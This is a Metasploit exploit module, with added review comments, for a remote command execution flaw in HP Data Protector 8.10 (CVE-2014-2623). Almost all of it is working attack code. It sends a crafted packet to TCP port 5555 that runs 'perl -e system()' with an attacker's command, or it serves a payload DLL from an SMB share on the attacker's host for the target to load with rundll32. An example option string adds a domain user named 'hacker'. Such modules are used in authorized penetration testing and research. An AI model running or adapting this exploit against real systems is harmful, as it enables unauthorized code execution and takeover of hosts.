metasploit-gs/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for the HP Data Protector 8.10 remote command execution
  # issue (CVE-2014-2623, see 'References' below): a crafted request to the
  # Data Protector service on TCP port 5555 results in command execution.
  # The module either runs a caller-supplied command (CMD option) or serves a
  # payload DLL over SMB and has the target load it with rundll32.exe.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp           # connect / disconnect / sock
  include Msf::Exploit::Remote::SMBFileServer # start_smb_server, SRVHOST option
  include Msf::Exploit::EXE                   # generate_payload_dll

  # Registers module metadata and the two options this module reads:
  # RPORT (default 5555) and the optional CMD string.
  def initialize(info={})
    super(update_info(info,
      'Name' => 'HP Data Protector 8.10 Remote Command Execution',
      'Description' => %q{
        A remote command execution is triggered when a crafted command is sent to the Hp Data Protector Manager on TCP Port 5555.
      },
      'Author' => [
        'Christian (Polunchis) Ramirez https://intrusionlabs.org', # POC
        'Henoch (Chanoc) Barrera       https://intrusionlabs.org', # POC
        'Matthew Hall <hallm@sec-1.com>' # Metasploit Module
      ],
      'References' =>
        [
          [ 'CVE', '2014-2623' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/34066/'], # POC
          [ 'URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
          [ 'URL', 'http://www.sec-1.com/blog/']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged' => true,
      'Platform' => 'win',
      'Targets' =>
        [
          # 'Offset' is the per-target constant added to the command length
          # when building the request in exec_bar.
          [ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Nov 02 2014'))
    register_options(
      [
        Opt::RPORT(5555),
        OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
      ],
      self.class)
  end

  # Fingerprints the service and maps the reported version onto a CheckCode:
  # Unknown when the service returns nothing, Safe when the banner is not an
  # A.08.xx release, Appears for minor versions below 11, Detected otherwise.
  def check
    fingerprint = get_fingerprint
    if fingerprint.nil?
      return Exploit::CheckCode::Unknown
    end
    print_status("#{peer} - HP Data Protector version #{fingerprint}")
    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
      minor = $1.to_i # $1 holds the minor version captured by the =~ just above
    else
      return Exploit::CheckCode::Safe
    end
    if minor < 11
      return Exploit::CheckCode::Appears
    elsif minor == 12
      # NOTE(review): this branch and the else branch return the same code, so
      # the == 12 test currently has no effect; collapse it or confirm whether
      # minor 12 was meant to get a different result.
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Detected
    end
  end

  # Builds the payload DLL and serves it from a randomly named SMB share.
  # Sets @exe_file, @share and @unc (the UNC path the target is told to load).
  def start_server
    vprint_status("Generating our malicious dll...")
    exe = generate_payload_dll
    @exe_file = rand_text_alpha(7) + ".dll"
    @share = rand_text_alpha(5)
    # A SRVHOST of 0.0.0.0 is not an address the target can connect back to,
    # so the local source address is advertised in the UNC path instead.
    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
    vprint_status("About to start SMB Server on: " + @unc)
    # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
    start_smb_server(@unc, exe, @exe_file)
  end

  # "host:port" of the remote target, used in status and failure messages.
  def peer
    "#{rhost}:#{rport}"
  end

  # Sends 64 random upper-case letters to the service and returns its reply
  # converted to ASCII with the trailing character(s) trimmed by chop/chomp,
  # or nil when the service sends nothing back. The connection is closed
  # before returning in both cases.
  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect
    if resp.nil?
      return nil
    end
    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
  end

  # Sends the command request carrying +cmd+ to the service.
  # When the CMD option is set, the reply is awaited for up to 20 seconds and
  # validated with exec_bar?; otherwise the payload handler is started.
  # The connection is closed on every path.
  def exec_bar(cmd)
    connect
    # Each backslash becomes two (the gsub replacement "\\\\\\\\" is an escaped
    # double backslash) — presumably so the command survives the quoted perl
    # string built below; verify against the target's parsing if changed.
    cmd = cmd.gsub("\\", "\\\\\\\\")
    vprint_status("Sending Command: #{cmd}")
    # Length field: the target's 'Offset' plus the length of the escaped command.
    cmd_no = target['Offset'] + cmd.length
    vprint_status("Size is #{cmd_no}")
    pkt = "\x00\x00\x00"
    pkt << cmd_no # String#<< treats an Integer as a codepoint and appends it as one character
    pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
    pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
    pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
    pkt << "('#{cmd}')" # Executable
    pkt << "\x00"
    sock.put(pkt)
    # In my testing the default timeout (10) isn't enough
    if datastore['CMD']
      begin
        res = sock.get_once(-1, 20)
      rescue EOFError
        # Peer closed the connection before answering: disconnect and return
        # nil without reporting a failure.
        disconnect
        return
      end
      fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
      disconnect
    else
      handler
      disconnect
    end
  end

  # True when +data+ is the expected acknowledgement: the four fields unpacked
  # as N, n, V, v must equal 8, 0xfffe, 0x36 and 0 respectively.
  # Blank input is never a match.
  def exec_bar?(data)
    return false if data.blank?
    data_unpacked = data.unpack("NnVv")
    # NOTE(review): unpack with four directives always yields four elements
    # (nil where bytes are missing), so the length test cannot fail on its
    # own; the value comparisons are what reject short or foreign replies.
    data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
  end

  # Entry point. With CMD set, runs that command directly; otherwise serves the
  # payload DLL over SMB and instructs the target to load it via rundll32.exe.
  def exploit
    if datastore['CMD']
      print_status("Executing command #{datastore['CMD']}")
      exec_bar(datastore['CMD'])
    else
      start_server
      print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{@unc}")
      # Follows rundll32's "<dll>,<entrypoint>" syntax; a random digit is used
      # for the entry-point argument.
      sploit = "rundll32.exe #{@unc},"
      sploit << rand_text_numeric(1)
      exec_bar(sploit)
    end
  end
end